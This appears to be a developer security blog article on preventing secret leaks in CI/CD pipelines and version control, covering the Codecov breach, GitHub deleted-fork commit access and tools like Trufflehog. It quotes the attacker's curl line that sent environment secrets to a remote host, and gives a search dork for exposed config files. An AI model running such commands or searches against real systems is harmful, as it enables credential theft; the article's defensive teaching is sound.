Security Concepts for Developers: Trivial Packages
Discover the hidden risks of using trivial packages in development. Learn how small, seemingly insignificant dependencies can lead to significant security vulnerabilities.
Discover essential strategies for managing developer secrets and preventing leaks in CI/CD pipelines, version control systems, and third-party dependencies.
In 2021, security researcher Bill Demirkapi began building automated processes to find secrets across the Internet. At DEFCON 32, he presented his findings - more than 15,000 developer secrets were inadvertently hard-coded into software. Among those vulnerable to compromise were the Nebraska State Supreme Court and Slack channels of Stanford University.
In modern software development, Continuous Integration and Continuous Delivery (CI/CD) streamlines the development cycle. This increase in automation and frequency of deployments also introduces risks, particularly in regard to secret management.
The use of third party resources and the valid secrets they require can easily be overlooked when ensuring deadlines are met.
Secrets include any credentials or tokens used for access control to systems, databases or services. These include:
Credential hygiene refers to the practices associated with managing and protecting secrets. Insufficient credential hygiene is included in the OWASP Top 10 CI/CD Security Risks list.
Malicious attackers can obtain various types of secrets spread throughout the CI/CD pipeline to gain unauthorized access to critical resources and the data they store.
Poor hygiene practices in regard to secret confidentiality can result in them being found within:
intitle:"index of" "config.php.txt"
can be used as the search query and will return unsecured WordPress configuration files that contain MySQL credentials./api/v1/user?userid=12
endpoint could reveal sensitive information if the application is vulnerable to an Insecure Direct Object Reference (IDOR) attack and also returns the data for userid=13
.The following two incidents demonstrate how secrets are obtained by malicious attackers:
On January 31st of 2021, Codecov became aware that their Bash Uploader script had become compromised after unauthorized access and modification was accomplished via an exploit of their Docker image creation process.
Docker images can be vulnerable to secret exfiltration in several ways. The source code may have embedded secrets, present in the file that creates the image (known as the Dockerfile) or within the layers that build the image. This can happen inadvertently when building the image if secrets are read in from other systems and embedded as environment variables ready to be used when the container is executed.
A malicious attacker was able to extract a secret that enabled them to make the adjustments to the bash commands within the Bash Uploader script. The modification made was the addition of the following:
curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” https://[IPADDRESS]/upload/v2 || true
This malicious line of code exported any secrets accessible to the Bash Uploader to the attacker controlled IP addresses hosting the upload script. Using these secrets, the attackers compromised the associated sources of sensitive information of the affected Codecov users.
The Codecov breach underscores the importance of safeguarding CI/CD pipelines. By embedding secrets in Docker images, they became exposed, allowing attackers to compromise user data.
When secrets are mistakenly included in code pushed to version control systems, they are exposed to anyone with repository access and will persist in version history even after deletion.
Publicly exposed credentials will be exploitable until they are revoked.
This also expands the attack surface since even though secrets may not be present in the current state of your codebase - they can be hidden within any iteration on the historical timeline.
A new vulnerability type discovered by Truffle Security allows access to data from deleted forks and repositories (even private ones) on Github. Due to its similarity to an IDOR vulnerability - it has been coined as Cross Fork Object Reference (CFOR).
In a CFOR attack, if an attacker knows the SHA-1 hash of a commit, they can access the contents of that commit—even from deleted forks or repositories—by inserting the hash into a GitHub URL. This allows unauthorized access to code and potentially sensitive data that should no longer be accessible.
https://github.com/<user/org>/<repository>/<commit>/<hash>
As with other Universally Unique Identifiers (UUIDs) - the SHA-1 hash string utilized to identify a commit can be referenced by its short value. The short SHA-1 value is the minimum number of characters needed to avoid a collision with another hash (with a bare minimum of 4 hexadecimal characters). The factorial of the short value can be calculated with 16*16*16*16
for a total of only 65,536 unique combinations. Iterating over every possible value would be trivial for an automated program.
This vulnerability significantly expands the attack surface for repositories that were thought to be private or deleted. If secrets were ever committed to such repositories, they remain at risk of exposure—even after deletion.
IBM publishes annual analysis reports on the financial repercussions for organizations that become victims of data breaches. The latest report, “Cost of a Data Breach Report 2024”, reveals that 16% of all breaches studied can be attributed to stolen credentials as the utilized attack vector.
These incidents are notably expensive, costing an average of $4.81 million per breach. Furthermore, breaches involving stolen or compromised credentials took the longest to detect - taking an average of 229 days to identify. Additionally, the containment of such breaches required an extra 63 days.
Beyond the direct financial costs and operational delays, the consequences of a breach due to compromised credentials can extend to:
Now that we understand the risks, let’s explore practical steps to manage secrets effectively.
To mitigate your risk to leaked secrets, reduce the harm to your organization that they bring and prevent them from leaking in the first place, adhere to the following suggestions:
git add *
, can capture files containing sensitive information. You can manually review each commit to ensure you have the right files included, but a better approach is to set up a .gitignore
file (below).Automated tooling is the best way to enhance your secrets management because it will provide consistent protection.
1Password provides a secure way to store and manage credentials and secrets and can be integrated into your CLI. With 1Password CLI:
Trufflehog is a tool provided by Truffle Security. With Trufflehog:
Trufflehog is also available as a Chrome Extension.
It’s good practice to use a secrets management tool for any type of coding project, even personal ones because you can get into the habit of using them.
There are a variety of different secret management services to choose from, though when making a selection, the service should provide the following:
As a developer, protecting your code and infrastructure from secret leaks and security vulnerabilities is critical. To safeguard your projects, take these key actions:
By following these best practices and integrating automated tools, you can minimize your security risks and stay ahead of potential vulnerabilities.
Discover the hidden risks of using trivial packages in development. Learn how small, seemingly insignificant dependencies can lead to significant security vulnerabilities.
Strategies used to deliver malware infested packages - via a dependency confusion attack - and how to mitigate them.
Insights into how to stay vigilant against malicious actors tampering with your dependencies.
Get the full posts by email every week.